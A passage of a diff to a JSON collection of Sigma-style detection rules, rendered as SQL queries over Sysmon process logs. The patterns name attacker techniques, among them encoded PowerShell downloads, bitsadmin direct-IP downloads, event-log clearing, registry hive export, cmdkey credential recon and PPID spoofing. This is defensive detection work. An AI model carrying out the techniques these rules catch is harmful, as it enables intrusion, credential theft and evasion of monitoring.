'\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_powershell_webclient_casing.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "title": "Suspicious Remote Child Process From Outlook", + "id": "e212d415-0e93-435f-9e1a-f29005bb4723", + "status": "test", + "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", - "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "test", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_tscon_rdp_redirect.yml" }, { "title": "Potential Windows Defender Tampering Via Wmic.EXE", @@ -7508,765 +7293,738 @@ "filename": "proc_creation_win_wmic_namespace_defender.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Eventlog Clear or Configuration Change", + "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "status": "stable", + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1070.001", + "attack.t1562.002", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Maintenance activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_susp_eventlog_clear.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", + "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "status": "test", + "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "Legitimate software creating script event consumers" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + }, + { + "title": "Suspicious Download From Direct IP Via Bitsadmin", + "id": "99c840f2-2012-46fd-9141-c761987550ef", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1543.003" + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "description": "Detects the use of SDelete to erase a file not the free space", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE 